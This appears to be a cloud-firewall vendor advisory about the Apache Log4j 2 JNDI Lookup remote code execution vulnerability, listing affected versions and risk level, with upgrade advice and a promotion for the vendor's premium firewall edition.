Apache Log4j 2 is a popular Java logging framework that is used for business system development.

The Apache Log4j 2 remote code execution (RCE) vulnerability occurs after the Lookup feature is enabled. By default, the Lookup feature is enabled for Log4j 2. After the feature is enabled, special values are automatically added to logs. You can use the Lookup feature in Java Naming and Directory Interface (JNDI). The Lookup feature does not impose limits on the number of data entries that are queried by using JNDI operations. As a result, attackers can use JNDI to remotely create a malicious class in an application, which causes the RCE vulnerability.
Note Cloud Firewall has detected and blocked attacks that exploit the RCE vulnerability.

Impact scope: Apache Log4j 2.x < 2.15.0-rc2

Risk level: high

Rule-based defense: A virtual patch is available in the Cloud Firewall console to defend against this vulnerability.

Rule type: command execution

Suggestions:
  • Check whether the Apache Log4j 2 JAR file is imported into your business system.

    If a dependency is imported into your business system, the vulnerability may exist. You can upgrade Apache Log4j 2 to the latest version for your business system.

  • Upgrade all applications and components that are affected by the vulnerability to the latest versions.

    For example, if the pring-boot-starter-log4j2/Apache Struts2/Apache Solr/Apache Druid/Apache Flink component is affected by the vulnerability, you must upgrade the component to the latest version.

  • Purchase Cloud Firewall Premium Edition or higher.

    You can apply for the 7-day free trial of Cloud Firewall Premium Edition. For more information, see Apply for a free trial of Cloud Firewall.